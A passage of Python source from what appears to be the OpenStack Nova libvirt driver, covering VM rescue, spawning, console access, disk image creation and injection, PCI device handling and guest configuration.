power_state.PAUSED)
if state in ignored_states:
return
except exception.NovaException:
pass
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
        should not edit or override the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
if image_meta is not None:
rescue_image_id = image_meta.get('id')
else:
rescue_image_id = None
rescue_images = {
'image_id': (rescue_image_id or
CONF.libvirt.rescue_image_id or instance.image_ref),
'kernel_id': (CONF.libvirt.rescue_kernel_id or
instance.kernel_id),
'ramdisk_id': (CONF.libvirt.rescue_ramdisk_id or
instance.ramdisk_id),
}
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
None,
image_meta,
rescue=True)
self._create_image(context, instance,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
image_meta, rescue=rescue_images,
write_to_disk=True)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance.name)
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self._get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
self._create_image(context, instance,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
xml = self._get_guest_xml(context, instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info)
LOG.debug("Instance is running", instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance spawned successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_LI('data: %(data)r, fpath: %(fpath)r'),
{'data': data, 'fpath': fpath})
with open(fpath, 'a+') as fp:
fp.write(data)
return fpath
def get_console_output(self, context, instance):
virt_dom = self._lookup_by_name(instance.name)
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_LI('Truncated console log returned, '
'%d bytes ignored'), remaining,
instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_LI('Truncated console log returned, '
'%d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, context, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
# NOTE(rmk): We had VNC consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='vnc')
port = get_vnc_port_for_instance(instance.name)
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
def get_spice_console(self, context, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
# NOTE(rmk): We had Spice consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='spice')
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug("This python runtime does not support direct I/O")
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
            # Check whether a write with 512-byte alignment is allowed
align_size = 512
m = mmap.mmap(-1, align_size)
m.write(r"x" * align_size)
os.write(f, m)
os.close(f)
LOG.debug("Path '%(path)s' supports direct I/O",
{'path': dirpath})
except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'", {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'"),
{'path': dirpath, 'ex': str(e)})
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'"), {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
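        # Sketch: local_size=10 with unit='G' creates a raw image of size
        # '10G' (roughly `qemu-img create -f raw <target> 10G`, assuming the
        # utility shells out to qemu-img).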
def _create_ephemeral(self, target, ephemeral_size,
fs_label, os_type, is_block_dev=False,
max_size=None, specified_fs=None):
if not is_block_dev:
self._create_local(target, ephemeral_size)
# Run as root only for block devices.
disk.mkfs(os_type, fs_label, target, run_as_root=is_block_dev,
specified_fs=specified_fs)
@staticmethod
def _create_swap(target, swap_mb, max_size=None):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
@staticmethod
def _get_disk_config_path(instance, suffix=''):
return os.path.join(libvirt_utils.get_instance_path(instance),
'disk.config' + suffix)
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _chown_disk_config_for_instance(self, instance):
disk_config = self._get_disk_config_path(instance)
if os.path.exists(disk_config):
libvirt_utils.chown(disk_config, os.getuid())
@staticmethod
def _is_booted_from_volume(instance, disk_mapping):
"""Determines whether the VM is booting from volume
Determines whether the disk mapping indicates that the VM
is booting from a volume.
"""
return ((not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping)
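        # Example: an instance with an empty image_ref, or a disk_mapping
        # without a 'disk' entry, is treated as booted from a volume.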
def _inject_data(self, instance, network_info, admin_pass, files, suffix):
"""Injects data in a disk image
Helper used for injecting data in a disk image file system.
Keyword arguments:
        instance -- a dict containing the instance specification
        network_info -- a dict containing the network specification
        admin_pass -- a string used to set an admin password
        files -- a list of files to be injected
suffix -- a string used as an image name suffix
"""
# Handles the partition need to be used.
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt.inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt.virt_type == 'lxc':
target_partition = None
# Handles the key injection.
if CONF.libvirt.inject_key and instance.get('key_data'):
key = str(instance['key_data'])
else:
key = None
# Handles the admin password injection.
if not CONF.libvirt.inject_password:
admin_pass = None
# Handles the network injection.
net = netutils.get_injected_network_template(
network_info, libvirt_virt_type=CONF.libvirt.virt_type)
# Handles the metadata injection
metadata = instance.get('metadata')
image_type = CONF.libvirt.images_type
if any((key, net, metadata, admin_pass, files)):
injection_image = self.image_backend.image(
instance,
'disk' + suffix,
image_type)
img_id = instance['image_ref']
if not injection_image.check_image_exists():
LOG.warn(_LW('Image %s not found on disk storage. '
'Continue without injecting data'),
injection_image.path, instance=instance)
return
try:
disk.inject_data(injection_image.path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error injecting data into image '
'%(img_id)s (%(e)s)'),
{'img_id': img_id, 'e': e},
instance=instance)
def _create_image(self, context, instance,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None,
admin_pass=None, inject_files=True):
if not suffix:
suffix = ''
booted_from_volume = self._is_booted_from_volume(
instance, disk_mapping)
def image(fname, image_type=CONF.libvirt.images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(libvirt_utils.get_instance_path(instance))
LOG.info(_LI('Creating image'), instance=instance)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
        # NOTE(yaguang): For evacuate, disk.config already exists in shared
        # storage, so chown it.
self._chown_disk_config_for_instance(instance)
        # NOTE(vish): No need to add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 7)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = flavors.extract_flavor(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * units.Gi
if size == 0 or suffix == '.rescue':
size = None
backend = image('disk')
if backend.SUPPORTS_CLONE:
def clone_fallback_to_fetch(*args, **kwargs):
try:
backend.clone(context, disk_images['image_id'])
except exception.ImageUnacceptable:
libvirt_utils.fetch_image(*args, **kwargs)
fetch_func = clone_fallback_to_fetch
else:
fetch_func = libvirt_utils.fetch_image
backend.cache(fetch_func=fetch_func,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = disk.get_fs_type_for_os_type(
instance['os_type'])
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
disk_image = image('disk.local')
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * units.Gi
disk_image.cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for idx, eph in enumerate(driver.block_device_info_get_ephemerals(
block_device_info)):
disk_image = image(blockinfo.get_eph_disk(idx))
specified_fs = eph.get('guest_format')
if specified_fs and not self.is_supported_fs_format(specified_fs):
msg = _("%s format is not supported") % specified_fs
raise exception.InvalidBDMFormat(details=msg)
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % idx,
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
size = eph['size'] * units.Gi
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
disk_image.cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'],
specified_fs=specified_fs)
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * units.Mi
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_LI('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md, network_info=network_info)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = self._get_disk_config_path(instance, suffix)
LOG.info(_LI('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Creating config drive failed '
'with error: %s'),
e, instance=instance)
def dummy_fetch_func(target, *args, **kwargs):
                # NOTE(sileht): this is never called because the target has
                # already been created by the cdb.make_drive call above
pass
raw('disk.config').cache(fetch_func=dummy_fetch_func,
context=context,
filename='disk.config' + suffix)
# File injection only if needed
elif inject_files and CONF.libvirt.inject_partition != -2:
if booted_from_volume:
LOG.warn(_LW('File injection into a boot from volume '
'instance is not supported'), instance=instance)
self._inject_data(
instance, network_info, admin_pass, files, suffix)
if CONF.libvirt.virt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def _prepare_pci_devices_for_use(self, pci_devices):
        # kvm and qemu support managed mode
# In managed mode, the configured device will be automatically
# detached from the host OS drivers when the guest is started,
# and then re-attached when the guest shuts down.
if CONF.libvirt.virt_type != 'xen':
# we do manual detach only for xen
return
try:
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
# Note(yjiang5) Spelling for 'dettach' is correct, see
# http://libvirt.org/html/libvirt-libvirt.html.
libvirt_dev.dettach()
            # Note(yjiang5): A reset of one PCI device may impact other
            # devices on the same bus, thus we need two separate loops
            # to detach and then reset them.
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
libvirt_dev.reset()
except libvirt.libvirtError as exc:
raise exception.PciDevicePrepareFailed(id=dev['id'],
instance_uuid=
dev['instance_uuid'],
reason=str(exc))
def _detach_pci_devices(self, dom, pci_devs):
        # For libvirt versions < 1.1.1 this is a race condition,
        # so forbid detaching unless the minimum version is met.
if not self._has_min_version(MIN_LIBVIRT_DEVICE_CALLBACK_VERSION):
if pci_devs:
reason = (_("Detaching PCI devices with libvirt < %(ver)s"
" is not permitted") %
{'ver': MIN_LIBVIRT_DEVICE_CALLBACK_VERSION})
raise exception.PciDeviceDetachFailed(reason=reason,
dev=pci_devs)
try:
for dev in pci_devs:
dom.detachDeviceFlags(self._get_guest_pci_device(dev).to_xml(),
libvirt.VIR_DOMAIN_AFFECT_LIVE)
# after detachDeviceFlags returned, we should check the dom to
# ensure the detaching is finished
xml = dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
guest_config = vconfig.LibvirtConfigGuest()
guest_config.parse_dom(xml_doc)
for hdev in [d for d in guest_config.devices
if isinstance(d, vconfig.LibvirtConfigGuestHostdevPCI)]:
hdbsf = [hdev.domain, hdev.bus, hdev.slot, hdev.function]
dbsf = pci_utils.parse_address(dev['address'])
if [int(x, 16) for x in hdbsf] ==\
[int(x, 16) for x in dbsf]:
                        raise exception.PciDeviceDetachFailed(
                            reason="timeout", dev=dev)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("Instance disappeared while detaching "
"a PCI device from it."))
else:
raise
def _attach_pci_devices(self, dom, pci_devs):
try:
for dev in pci_devs:
dom.attachDevice(self._get_guest_pci_device(dev).to_xml())
except libvirt.libvirtError:
LOG.error(_LE('Attaching PCI devices %(dev)s to %(dom)s failed.'),
{'dev': pci_devs, 'dom': dom.ID()})
raise
def _set_host_enabled(self, enabled,
disable_reason=DISABLE_REASON_UNDEFINED):
"""Enables / Disables the compute service on this host.
This doesn't override non-automatic disablement with an automatic
        setting, thereby permitting operators to keep otherwise
healthy hosts out of rotation.
"""
status_name = {True: 'disabled',
False: 'enabled'}
disable_service = not enabled
ctx = nova_context.get_admin_context()
try:
service = objects.Service.get_by_compute_host(ctx, CONF.host)
if service.disabled != disable_service:
# Note(jang): this is a quick fix to stop operator-
# disabled compute hosts from re-enabling themselves
# automatically. We prefix any automatic reason code
# with a fixed string. We only re-enable a host
# automatically if we find that string in place.
# This should probably be replaced with a separate flag.
if not service.disabled or (
service.disabled_reason and
service.disabled_reason.startswith(DISABLE_PREFIX)):
service.disabled = disable_service
service.disabled_reason = (
DISABLE_PREFIX + disable_reason
if disable_service else DISABLE_REASON_UNDEFINED)
service.save()
LOG.debug('Updating compute service status to %s',
status_name[disable_service])
else:
LOG.debug('Not overriding manual compute service '
'status with: %s',
status_name[disable_service])
except exception.ComputeHostNotFound:
            LOG.warn(_LW('Cannot update service status on host: %s, '
                         'since it is not registered.'), CONF.host)
except Exception:
            LOG.warn(_LW('Cannot update service status on host: %s, '
                         'due to an unexpected exception.'), CONF.host,
exc_info=True)
def _get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self._conn.baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: " "%(error)s"),
{'uri': self.uri(), 'error': ex})
else:
raise
return self._caps
def _get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self._get_host_capabilities()
return caps.host.uuid
def _get_guest_cpu_model_config(self):
mode = CONF.libvirt.cpu_mode
model = CONF.libvirt.cpu_model
if (CONF.libvirt.virt_type == "kvm" or
CONF.libvirt.virt_type == "qemu"):
if mode is None:
mode = "host-model"
if mode == "none":
return vconfig.LibvirtConfigGuestCPU()
else:
if mode is None or mode == "none":
return None
if ((CONF.libvirt.virt_type != "kvm" and
CONF.libvirt.virt_type != "qemu")):
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt.virt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug("CPU mode '%(mode)s' model '%(model)s' was chosen",
{'mode': mode, 'model': (model or "")})
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
return cpu
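        # Illustrative outcomes: cpu_mode='custom' with cpu_model='Nehalem'
        # (hypothetical values) yields mode='custom', model='Nehalem'; the
        # kvm/qemu default of mode='host-model' leaves the model unset.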
def _get_guest_cpu_config(self, flavor, image):
cpu = self._get_guest_cpu_model_config()
if cpu is None:
return None
topology = hardware.VirtCPUTopology.get_best_config(flavor,
image)
cpu.sockets = topology.sockets
cpu.cores = topology.cores
cpu.threads = topology.threads
return cpu
def _get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'],
self._get_hypervisor_version())
def _get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt.virt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self._get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self._get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self._get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self._get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
instance.default_ephemeral_device = (
block_device.prepend_dev(disklocal.target_dev))
instance.save()
for idx, eph in enumerate(
driver.block_device_info_get_ephemerals(
block_device_info)):
diskeph = self._get_guest_disk_config(
instance,
blockinfo.get_eph_disk(idx),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self._get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
instance.default_swap_device = (
block_device.prepend_dev(diskswap.target_dev))
instance.save()
for vol in block_device_mapping:
connection_info = vol['connection_info']
vol_dev = block_device.prepend_dev(vol['mount_device'])
info = disk_mapping[vol_dev]
cfg = self._connect_volume(connection_info, info)
devices.append(cfg)
vol['connection_info'] = connection_info
vol.save()
if 'disk.config' in disk_mapping:
            # NOTE(sileht): a configdrive is a raw image; it works well with
            # the rbd, lvm and raw images_type settings, but we must force
            # image_type to raw if the desired images_type is qcow2
if CONF.libvirt.images_type not in ['rbd', 'lvm']:
image_type = "raw"
else:
image_type = None
diskconfig = self._get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
image_type)
devices.append(diskconfig)
for d in devices:
self._set_cache_mode(d)
if (image_meta and
image_meta.get('properties', {}).get('hw_scsi_model')):
hw_scsi_model = image_meta['properties']['hw_scsi_model']
scsi_controller = vconfig.LibvirtConfigGuestController()
scsi_controller.type = 'scsi'
scsi_controller.model = hw_scsi_model
devices.append(scsi_controller)
return devices
def _get_host_sysinfo_serial_hardware(self):
"""Get a UUID from the host hardware
Get a UUID for the host hardware reported by libvirt.
This is typically from the SMBIOS data, unless it has
been overridden in /etc/libvirt/libvirtd.conf
"""
return self._get_host_uuid()
def _get_host_sysinfo_serial_os(self):
"""Get a UUID from the host operating system
Get a UUID for the host operating system. Modern Linux
distros based on systemd provide a /etc/machine-id
file containing a UUID. This is also provided inside
systemd based containers and can be provided by other
init systems too, since it is just a plain text file.
"""
with open("/etc/machine-id") as f:
# We want to have '-' in the right place
# so we parse & reformat the value
return str(uuid.UUID(f.read().split()[0]))
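        # Example (hypothetical value): a machine-id of
        # '45cf07e7f7c94ab2a0e4c1ef5e3a9b21' is reformatted by uuid.UUID into
        # '45cf07e7-f7c9-4ab2-a0e4-c1ef5e3a9b21'.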
def _get_host_sysinfo_serial_auto(self):
if os.path.exists("/etc/machine-id"):
return self._get_host_sysinfo_serial_os()
else:
return self._get_host_sysinfo_serial_hardware()
def _get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self._sysinfo_serial_func()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def _get_guest_pci_device(self, pci_device):
dbsf = pci_utils.parse_address(pci_device['address'])
dev = vconfig.LibvirtConfigGuestHostdevPCI()
dev.domain, dev.bus, dev.slot, dev.function = dbsf
        # only kvm and qemu support managed mode
if CONF.libvirt.virt_type in ('xen',):
dev.managed = 'no'
if CONF.libvirt.virt_type in ('kvm', 'qemu'):
dev.managed = 'yes'
return dev
def _get_guest_config_meta(self, context, instance, flavor):
"""Get metadata config for guest."""
meta = vconfig.LibvirtConfigGuestMetaNovaInstance()
meta.package = version.version_string_with_package()
meta.name = instance["display_name"]
meta.creationTime = time.time()
if instance["image_ref"] not in ("", None):
meta.roottype = "image"
meta.rootid = instance["image_ref"]
if context is not None:
ometa = vconfig.LibvirtConfigGuestMetaNovaOwner()
ometa.userid = context.user_id
ometa.username = context.user_name
ometa.projectid = context.project_id
ometa.projectname = context.project_name
meta.owner = ometa
fmeta = vconfig.LibvirtConfigGuestMetaNovaFlavor()
fmeta.name = flavor.name
fmeta.memory = flavor.memory_mb
fmeta.vcpus = flavor.vcpus
fmeta.ephemeral = flavor.ephemeral_gb
fmeta.disk = flavor.root_gb
fmeta.swap = flavor.swap
meta.flavor = fmeta
return meta
def _machine_type_mappings(self):
mappings = {}
for mapping in CONF.libvirt.hw_machine_type:
host_arch, _, machine_type = mapping.partition('=')
mappings[host_arch] = machine_type
return mappings
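        # Example (hypothetical config): hw_machine_type =
        # ['x86_64=pc-i440fx-2.1', 'armv7l=vexpress-a15'] produces
        # {'x86_64': 'pc-i440fx-2.1', 'armv7l': 'vexpress-a15'}.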
def _get_machine_type(self, image_meta, caps):
# The underlying machine type can be set as an image attribute,
# or otherwise based on some architecture specific defaults
mach_type = None
if (image_meta is not None and image_meta.get('properties') and
image_meta['properties'].get('hw_machine_type')
is not None):
mach_type = image_meta['properties']['hw_machine_type']
else:
# For ARM systems we will default to vexpress-a15 for armv7
# and virt for aarch64
if caps.host.cpu.arch == "armv7l":
mach_type = "vexpress-a15"
if caps.host.cpu.arch == "aarch64":
mach_type = "virt"
# If set in the config, use that as the default.
if CONF.libvirt.hw_machine_type:
mappings = self._machine_type_mappings()
mach_type = mappings.get(caps.host.cpu.arch)
return mach_type
def _get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None,
context=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
img_meta_prop = image_meta.get('properties', {}) if image_meta else {}
CONSOLE = "console=tty0 console=ttyS0"
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt.virt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
# We are using default unit for memory: KiB
guest.memory = flavor.memory_mb * units.Ki
guest.vcpus = flavor.vcpus
guest.cpuset = hardware.get_vcpu_pin_set()
guest.metadata.append(self._get_guest_config_meta(context,
instance,
flavor))
cputuning = ['shares', 'period', 'quota']
for name in cputuning:
key = "quota:cpu_" + name
if key in flavor.extra_specs:
if guest.cputune is None:
guest.cputune = vconfig.LibvirtConfigGuestCPUTune()
setattr(guest.cputune, name,
int(flavor.extra_specs[key]))
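        # Example (hypothetical flavor): an extra spec of
        # {'quota:cpu_shares': '2048'} sets guest.cputune.shares = 2048;
        # 'quota:cpu_period' and 'quota:cpu_quota' are handled the same way.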
guest.cpu = self._get_guest_cpu_config(flavor, image_meta)
if 'root' in disk_mapping:
root_device_name = block_device.prepend_dev(
disk_mapping['root']['dev'])
